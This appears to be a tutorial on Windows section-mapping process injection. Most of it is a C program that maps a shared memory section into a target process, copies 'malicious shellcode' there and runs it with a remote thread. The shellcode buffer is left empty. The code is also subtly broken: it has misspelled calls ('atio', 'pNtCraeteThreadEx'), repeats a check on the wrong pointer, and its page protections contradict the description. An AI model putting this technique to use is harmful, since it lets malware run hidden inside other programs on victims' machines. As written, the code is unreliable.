Section Mapping

What is the theory behind Section Mapping?

We create Block Of Memory that is shared between multiple process.
This section have a prospective for both the local process and target process which mean that the permissions will differ from each view.
finally we will inject malicious shellcode in the shared section and will execute it in the target process

Untitled

Section Mapping Steps

Create Section: we will add a new section to the memory with RWX page protection
Map To Local Process (Injector): we will map the section to the Injector Process with RW page protection to be able to read and write the malicious shellcode to memory
Map To Target Process: we will map the section to the Target Process with RX page protection to be able to read and execute the malicious shellcode wrote by the Injector Process
Shellcode Injection: move the shellcode to the the section which is mapped to the Local Process (Injector Process)
Start Execution: we will create a thread to execute the malicious shellcode from the Target Process

Untitled

Now let’s write a the section mapping code

#include <stdio.h>
#include <Windows.h>
#include <winternl.h>
#include <ntifs.h>

unsigned char payload[] =
"";

typedef NTSTATUS(NTAPI* _NtCreateSection)(
	PHANDLE SectionHandle,
	ACCESS_MASK DesiredAccess,
	POBJECT_ATTRIBUTES ObjectAttributes,
	PLARGE_INTEGER MaximumSize,
	ULONG SectionPageProtection,
	ULONG AllocationAttributes,
	HANDLE FileHandle
	);

typedef NTSTATUS(NTAPI* _NtMapViewOfSection)(
	HANDLE SectionHandle,
	HANDLE ProcessHandle,
	PVOID* BaseAddress,
	ULONG_PTR ZeroBits,
	SIZE_T CommitSize,
	PLARGE_INTEGER SectionOffset,
	PSIZE_T ViewSize,
	DWORD InheritDisposition,
	ULONG AllocationType,
	ULONG Win32Protect
	);

typedef NTSTATUS(NTAPI* _NtCreateThreadEx)(
	PHANDLE ThreadHandle,
	ACCESS_MASK DesiredAccess,
	POBJECT_ATTRIBUTES ObjectAttributes,
	HANDLE ProcessHandle,
	PVOID StartRoutine,
	PVOID Argument,
	ULONG CreateFlags,
	ULONG_PTR ZeroBits,
	SIZE_T StackSize,
	SIZE_T MaximumStackSize,
	PPS_ATTRIBUTE_LIST AttributeList
	);

typedef struct _PS_ATTRIBUTE {
	ULONG Attribute;
	SIZE_T Size;
	union {
		ULONG_PTR Value;
		PVOID ValuePtr;
	} u1;
	PSIZE_T ReturnLength;
} PS_ATTRIBUTE, * PPS_ATTRIBUTE;

typedef struct _PS_ATTRIBUTE_LIST {
	SIZE_T TotalLength;
	PS_ATTRIBUTE Attributes[1];
} PS_ATTRIBUTE_LIST, * PPS_ATTRIBUTE_LIST;

typedef enum _SECTION_INHERIT {
	ViewShare = 1,
	ViewUnmap = 2
} SECTION_INHERIT;

int main(int argc, char** argv)
{
	DWORD PID = NULL;
	if (argc > 2 || argc < 2)
	{
		printf("[!] Usage: example.exe PID");
		return EXIT_FAILURE;
	}
	else
	{
		PID = atio(argv[1]);
	}
	_NtCreateSection pNtCreateSection = (_NtCreateSection)GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtCreateSection");
	if (pNtCreateSection == INVALID_HANDLE_VALUE)
	{
		printf("[-] Unable To Locate NtCraeteSection API\\n");
		return EXIT_FAILURE;
	}
	else
	{
		printf("[+] Successfully Got Handle To The NtCreateSection API: %p\\n", pNtCreateSection);
	}
	_NtMapViewOfSection pNtMapViewOfSection = (_NtMapViewOfSection)GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtMapViewOfSection");
	if (pNtCreateSection == INVALID_HANDLE_VALUE)
	{
		printf("[-] Unable To Locate NtMapViewOfSection API\\n");
		return EXIT_FAILURE;
	}
	else
	{
		printf("[+] Successfully Got Handle To The NtMapViewOfSection API: %p\\n", pNtMapViewOfSection);
	}
	_NtCreateThreadEx pNtCreateThreadEx = (_NtCreateThreadEx)GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtCreateThreadEx");
	if (pNtCreateSection == INVALID_HANDLE_VALUE)
	{
		printf("[-] Unable To Locate NtCreateThreadEx API\\n");
		return EXIT_FAILURE;
	}
	else
	{
		printf("[+] Successfully Got Handle To The NtCreateThreadEx API: %p\\n", pNtCreateThreadEx);
	}
	NTSTATUS status = NULL;
	HANDLE hSection = NULL;
	HANDLE hTargeProcess = NULL;
	HANDLE hThread = NULL;
	PVOID local_view_addr = NULL;
	PVOID remote_view_addr = NULL;
	SIZE_T size = 0x1000;
	LARGE_INTEGER section_size = { size };
	hTargeProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, PID);
	if (hTargeProcess == INVALID_HANDLE_VALUE)
	{
		printf("[-] Faild To Get Handle To Target Process: %p\\n", hTargeProcess);
		return EXIT_FAILURE;
	}
	else
	{
		printf("[+] Successfully Got Handle To Target Process: %p\\n", hTargeProcess);
	}
	status = pNtCreateSection(&hSection, SECTION_ALL_ACCESS, NULL, &section_size, PAGE_EXECUTE_READ, SEC_COMMIT, NULL);
	if (!NT_SUCCESS(status))
	{
		printf("[-] Failed To Create Section. Err 0x%x \\n", status);
		return EXIT_FAILURE;
	}
	else
	{
		printf("[+] Successfully Created Section: 0x%x \\n", status);
	}
	status = pNtMapViewOfSection(hSection, GetCurrentProcess(), &local_view_addr, NULL, NULL, NULL, &size, ViewUnmap, NULL, PAGE_READWRITE);
	if (!NT_SUCCESS(status))
	{
		printf("[-] Failed To Map Section. Err 0x%x \\n", status);
		return EXIT_FAILURE;
	}
	else
	{
		printf("[+] Successfully Mapped Section To Local Process: 0x%x \\n", status);
	}
	status = pNtMapViewOfSection(hSection, hTargeProcess, &remote_view_addr, NULL, NULL, NULL, &size, ViewUnmap, NULL, PAGE_EXECUTE_READ);
	if (!NT_SUCCESS(status))
	{
		printf("[-] Failed To Map Section. Err 0x%x \\n", status);
		return EXIT_FAILURE;
	}
	else
	{
		printf("[+] Successfully Mapped Section To Targe Process: 0x%x \\n", status);
	}
	if (memcpy(local_view_addr, payload, sizeof(payload)))
	{
		printf("[+] Successfully Wrote The Malicious Shellcode To The Mapped Section\\n");
	}
	else 
	{
		printf("[-] Failed To Write The Malicious Shellcode To The Mapped Section\\n");
		return EXIT_FAILURE;
	}
	status = pNtCraeteThreadEx(&hThread, THREAD_ALL_ACCESS, NULL, hTargeProcess, (LPTHREAD_START_ROUTINE)remote_view_addr, NULL, FALSE, 0, 0, 0, NULL);
	if (!NT_SUCCESS(status))
	{
		printf("[-] Failed To Craete Thread. Err 0x%x \\n", status);
		return EXIT_FAILURE;
	}
	else
	{
		printf("[+] Successfully Created Thread: 0x%x \\n", status);
	}
}